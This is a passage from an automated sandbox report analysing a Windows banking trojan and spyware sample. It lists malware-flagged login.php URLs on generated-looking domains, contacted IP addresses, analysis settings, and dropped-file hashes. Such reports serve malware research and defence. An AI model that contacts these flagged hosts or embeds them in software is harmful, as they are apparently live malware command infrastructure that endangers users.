                                                                                                                                                                                                              http://qekyqop.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386712444.00000000040EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387387248.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D72000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2697302039.000000000899E000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://volyquk.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lymyxex.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://cdn.ampproject.orgsvchost.exe, 00000002.00000003.3279033707.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2343646996.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310750407.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2291219253.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346790386.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347416587.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2637865779.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2343198568.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://lysysyx.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://volyjif.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://vonypic.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365866545.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://puzyxip.com/login.phpsvchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://vofydak.com/login.phpsvchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377062429.0000000003357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                  52.34.198.229
                                                                                                                                                                                                                  lygyvuj.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  99.83.170.3
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02UStrue
                                                                                                                                                                                                                  75.2.71.199
                                                                                                                                                                                                                  puzylyp.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  103.150.10.48
                                                                                                                                                                                                                  gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                                  59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGfalse
                                                                                                                                                                                                                  23.253.46.64
                                                                                                                                                                                                                  gahyqah.comUnited States
                                                                                                                                                                                                                  19994RACKSPACEUSfalse
                                                                                                                                                                                                                  199.191.50.83
                                                                                                                                                                                                                  galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                                  40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                                                                                                  13.248.169.48
                                                                                                                                                                                                                  pupydeq.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  103.224.212.210
                                                                                                                                                                                                                  lyxynyx.comAustralia
                                                                                                                                                                                                                  133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                                  76.223.67.189
                                                                                                                                                                                                                  qexyhuv.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  18.208.156.248
                                                                                                                                                                                                                  pupycag.comUnited States
                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  208.100.26.245
                                                                                                                                                                                                                  lyvyxor.comUnited States
                                                                                                                                                                                                                  32748STEADFASTUSfalse
                                                                                                                                                                                                                  199.59.243.227
                                                                                                                                                                                                                  77026.bodis.comUnited States
                                                                                                                                                                                                                  395082BODIS-NJUSfalse
                                                                                                                                                                                                                  103.224.182.252
                                                                                                                                                                                                                  vofycot.comAustralia
                                                                                                                                                                                                                  133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                                  91.195.240.19
                                                                                                                                                                                                                  parkingpage.namecheap.comGermany
                                                                                                                                                                                                                  47846SEDO-ASDEfalse
                                                                                                                                                                                                                  162.255.119.102
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  22612NAMECHEAP-NETUStrue
                                                                                                                                                                                                                  188.114.97.3
                                                                                                                                                                                                                  lysyvan.comEuropean Union
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  44.221.84.105
                                                                                                                                                                                                                  gadyciz.comUnited States
                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  154.212.231.82
                                                                                                                                                                                                                  gadyniw.comSeychelles
                                                                                                                                                                                                                  133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                                                                                  188.114.96.3
                                                                                                                                                                                                                  qegyhig.comEuropean Union
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  85.17.31.122
                                                                                                                                                                                                                  gatyfus.comNetherlands
                                                                                                                                                                                                                  60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                                                                                                                                                                                  178.162.203.226
                                                                                                                                                                                                                  unknownGermany
                                                                                                                                                                                                                  28753LEASEWEB-DE-FRA-10DEtrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553852
Start date and time: 2024-11-11 18:49:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 13
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: UMwpXhA46R.exe (renamed because original name is a hash value)
Original Sample Name: ef7eacbab6cd35771675717a0a84939f529c1ac4.exe
Detection: MAL
Classification: mal100.bank.troj.spyw.expl.evad.winEXE@13/61@2294/28
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                                                                  • Number of executed functions: 92
                                                                                                                                                                                                                  • Number of non-executed functions: 238
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 2.23.209.160, 2.23.209.182, 2.23.209.176, 2.23.209.177, 2.23.209.183, 2.23.209.185, 2.23.209.130, 2.23.209.158, 2.23.209.189, 2.23.209.181, 2.23.209.135, 2.23.209.193, 2.23.209.187, 2.23.209.133, 20.42.65.92, 2.23.209.140, 2.23.209.149, 52.168.117.173, 52.182.143.212, 2.23.209.150, 2.23.209.144, 2.23.209.141, 13.89.179.12, 2.23.209.179
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, www.bing.com.edgekey.net, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com
                                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                  • VT rate limit hit for: UMwpXhA46R.exe
Time      Type             Description
12:51:07  API Interceptor  10x Sleep call for process: WerFault.exe modified
12:51:29  API Interceptor  432216x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 47.93.221.102
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):593
                                                                                                                                                                                                                  Entropy (8bit):7.626935561277827
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                                  MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                                  SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                                  SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                                  SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                  Entropy (8bit):7.211107091222298
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:NBQM2NMx5ZkFjA7/B4lTosFLcWdg+oFQy749du8szDLIalm:NB0wQFs7/B4vOWKvFnWduRPtlm
                                                                                                                                                                                                                  MD5:83EB358D93A58A5515D37544731C6C51
                                                                                                                                                                                                                  SHA1:EED72863382F3F9845DC020DCDCF4C7656D619F3
                                                                                                                                                                                                                  SHA-256:32D53F571A785269AA1D589299B1E02697B49130CF3059E8071A08A9A946B67E
                                                                                                                                                                                                                  SHA-512:9EEFF293218D0A5BEE5932473C582D3EEA21A20DDA4AFB0D44DF38831DA01A62EAFC41FA1F15EE7DFB18379A4EF4B0327D88A78DDFF270C8714245E64C88E356
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                                                  Entropy (8bit):6.479691220248167
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                                  MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                                  SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                                  SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                                  SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59521
                                                                                                                                                                                                                  Entropy (8bit):7.972501252180373
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+12:ZRukFmHy4rG5tU2
                                                                                                                                                                                                                  MD5:523E24CD4C310923DF35FF33E2AD7020
                                                                                                                                                                                                                  SHA1:C15892132EA1D2E62567721871DA5F69F3F3E342
                                                                                                                                                                                                                  SHA-256:A246E3D514A5F96F1CE3FCEEFA455575BB656B0743710CBF4C9E50186D7794CE
                                                                                                                                                                                                                  SHA-512:556B8D6A853DCA7D66340B00ED72081CD2871F1F7355C14F8ABDD0F4179A5A46774E5A7B439BA7661D4F28180BFFE646C89BFBB751E1BF152525835C4D3FA55C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                                                  Entropy (8bit):6.479691220248167
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                                  MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                                  SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                                  SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                                  SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):25028
                                                                                                                                                                                                                  Entropy (8bit):7.979699699980115
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:U4ak8nl3r9HtbQ+z87BVjjWk5rSV4Z8tPzh3XCV5:VJElb9H187TjWKW4S8P
                                                                                                                                                                                                                  MD5:576A9BD2675F4AF8382B676F390A9500
                                                                                                                                                                                                                  SHA1:E3BEFE9AB331BA51E76AE56643BD37FF87E0E205
                                                                                                                                                                                                                  SHA-256:4EE290665A327D45B14757A7D11D509976DCF2BAF094CF3DED1CA31B194F821A
                                                                                                                                                                                                                  SHA-512:6C0079D523F7C4CF42C0321CF4A61A53E8315532D45CB1D919447F7B00D47A0A7D6AB57692BBF3DA1E7194BB9A30E23BC227CF86186B5D7938624D0DC8C7EFF1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1094
                                                                                                                                                                                                                  Entropy (8bit):7.839510823729912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiH4E/kTXRUubqU:QsSixez1Rg8yuIkTXRdqU
                                                                                                                                                                                                                  MD5:4A7E5199E2A9EA5F92BC9EDF6DCB1849
                                                                                                                                                                                                                  SHA1:F1FC2703611E16D6C10AC32274C7534497B3EA3B
                                                                                                                                                                                                                  SHA-256:95A468FFC06AA70269D28E83C5A09E59B8A824E1FC0DDF0B6C0D1D836E0F9A0E
                                                                                                                                                                                                                  SHA-512:C1E17D0A83BB42394F589AAE14B41842B39B778C9B47D93E44CED7389604E5022BC6872FC502028CC980CEC878952051E681ABC5985C5FFD4CFB381E42B57201
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0328449904901382
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:3et1eAIMhAw0BU/n555KjRJd64zuiFV9Z24IO8U85S:0zh0BU/gjPxzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:1BEE41582A64BD60A55D95D108CD1A81
                                                                                                                                                                                                                  SHA1:99E4B798049A0D5A47015D89BBF01F1224810633
                                                                                                                                                                                                                  SHA-256:D3D323283495A771046D19AF5209AEE4223F0BADB5D8853A3E0B29C911FE1B54
                                                                                                                                                                                                                  SHA-512:FE49F5E86367D6D6C75DCDAED0AC0C4CB75EC3F7FAE6EACDB880B32B8BD93B5F858ACA62252E47FE12849ED7854145E44F3B1404AC000B2804993CDE8FDAEB69
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.2.1.7.0.0.1.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.6.5.4.5.0.1.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.9.4.4.a.e.e.-.e.1.e.7.-.4.8.b.0.-.9.1.6.a.-.2.8.b.c.3.e.1.1.c.d.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.e.d.6.f.d.4.-.a.9.6.2.-.4.9.6.d.-.8.0.6.4.-.7.9.0.c.9.f.d.0.6.6.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.0.-.0.0.0.1.-.0.0.1.5.-.1.5.8.c.-.5.4.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):0.9868129628595451
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:CMWda1eAIM9Aw0BU/n555KjRJdwzuiFGZ24IO8U85S:1Wyz90BU/gjPCzuiFGY4IO8O
                                                                                                                                                                                                                  MD5:F15F7450DB66E1E121AB79BC7972BBA6
                                                                                                                                                                                                                  SHA1:42182A4355C6A0F5A4EC9E15D7FD11B910A1D755
                                                                                                                                                                                                                  SHA-256:956AAA93F01F6F001D98D98E656AE391C5CFEBB0D418391BB353413E75551D6E
